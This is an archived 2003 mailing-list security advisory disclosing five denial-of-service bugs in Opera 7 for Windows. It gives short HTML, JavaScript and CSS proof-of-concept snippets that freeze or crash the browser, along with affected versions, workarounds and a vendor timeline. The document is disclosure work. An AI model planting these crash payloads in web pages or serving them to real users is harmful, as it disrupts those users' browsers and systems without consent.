[Opera 7] Five DoS codes on general web sites

From: :: Operash :: (nesuminat_private)
Date: Mon Jun 30 2003 - 08:45:28 PDT

Next message: sec-labs team: "[sec-labs] Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code"

Previous message: aresuat_private: "CyberStrong Shopping Cart - Advisory & Exploit Code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

---------------------------------------------------------------------------------
TITLE          :[Opera 7] Five DoS codes on general web sites
                -= Fastest browser on earth, Fastest crash on earth too =-
PRODUCT        : Opera for Windows
VERSIONS       : 7.11b build 2887
                 7.11  build 2880
                 7.10  build 2840
                 7.03  build 2670
VENDOR         : Opera Software ASA (http://www.opera.com/)
SEVERITY       : Medium.
                 Abnormal Termination, Freeze, and DoS attacks.
DISCOVERED BY  : imagine, nesumin
AUTHOR         : :: Operash ::
REPORTED DATE  : 2003-06-24
PUBLISHED DATE : 2003-07-01
----------------------------------------------------------------------------------

0. PRODUCT INFORMATION
========================

  Opera for Windows is a GUI base Web browser.
  Opera Software ASA (http://www.opera.com/)


1. DESCRIPTION
================

  There are many unfixed bugs that cause abnormal termination
  or freeze down in Opera 7.
  Exploiting these bugs, attackers can do DoS attacks.

  Followings are 5 sample codes, which are in general web sites.


2. SAMPLE CODE & IMPACT
=========================

  [ CODE 1 ]

    Just 12 bytes data "<!DOCTYPE" + NULL(\x00) + 1byte + ">" makes
    CPU usage go up to 100%(depending on comp specs) and the computer
    gets freeze down.

    -----------------------------------------------------------------
      <!DOCTYPE[\x00]A>
    -----------------------------------------------------------------


  [ CODE 2 ]

    Abnormal termination is caused.

    -----------------------------------------------------------------
      <form></form><script>document.forms[0].submit()</script>
    -----------------------------------------------------------------


  [ CODE 3 ]

    Abnormal termination is caused.

    -----------------------------------------------------------------
      <table>
      <tr id="crash" style="display:inline"><td>
      <script>crash.style.display = "none";</script>
      </td></tr>
      </table>
    -----------------------------------------------------------------


  [ CODE 4 ]

    Abnormal termination is caused.

    -----------------------------------------------------------------
      <table>
      <map id="crash" style="position:absolute"></map>
      <script>crash.style.height = crash.style.width = '0';</script>
      </table>
    -----------------------------------------------------------------


  [ CODE 5 ]

    CPU usage go up to 100%(depending on comp specs) and the computer
    gets freeze down.

    -----------------------------------------------------------------
      <html>
      <head>
        <style type="text/css">
        <!--
        .aaaaa:after{content:"A";display:block}
        .bbbbb{display:run-in}
        .ccccc{display:inline-block}
        //-->
        </style>
      </head>
      <body>
      <div class="aaaaa">
       <div class="bbbbb">
        <div class="ccccc">
        </div>
       </div>
      </div>
      </body>
      </html>
    -----------------------------------------------------------------


3. SYSTEMS AFFECTED
=====================

  Opera (For Windows)
    7.11b build 2887
    7.11  build 2880
    7.10  build 2840
    7.03  build 2670 (Excepting [ CODE 5 ])
    Lower than 7.03 Versions might be affected too. (not tested)


4. EXAMINES
=============

  Opera (For Windows, English/Japanese) :
    7.11b build 2887
    7.11  build 2880
    7.10  build 2840
    7.03  build 2670

  Platform :
    Windows 98SE Japanese Edition
    Windows 2000 Pro SP3 Japanese Edition


5. WORKAROUND
===============

  [ CODE 1 ]  -----
  [ CODE 2 ]  Disable "JavaScript"
  [ CODE 3 ]  Disable "JavaScript"
  [ CODE 4 ]  Disable "JavaScript"
  [ CODE 5 ]  Disable "CSS Author mode"


6. TIME TABLE & VENDOR STATUS
===============================

  2003-06-24 Reported to vendor.
  2003-07-01 Released this advisory.

  No reply from vendor.


7. DISCLAIMER
===============

  A. We cannot guarantee the accuracy of all statements in this information.
  B. We do not anticipate issuing updated versions of this information
     unless there is some material change in the facts.
  C. And we will take no responsibility for any kinds of disadvantages by
     using this information.
  D. You can quote this advisory without our permission if you keep the following;
     a. Do not distort this advisory's content.
     b. A quoted place should be a medium on the Internet.
  E. If you have any questions, please contact to us.


  * Exception

     We strictly forbid 'Secunia' to republish or redistribute our advisory.

          ...Well, even though, we know this request would be ignored.

          The CTO of Secunia has told us;
            "If you do not want us to write about your vulnerabilities -
             then stop posting them!"

          Well.. We can do nothing for this sort of arrogance :/


8. CONTACT, ETC
=================

  :: Operash ::

  imagine (Operash Webmaster)
  nesumin <nesuminat_private>


  Thanks to :

    melorin
    piso(sexy)

Next message: sec-labs team: "[sec-labs] Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code"
Previous message: aresuat_private: "CyberStrong Shopping Cart - Advisory & Exploit Code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 01 2003 - 14:48:15 PDT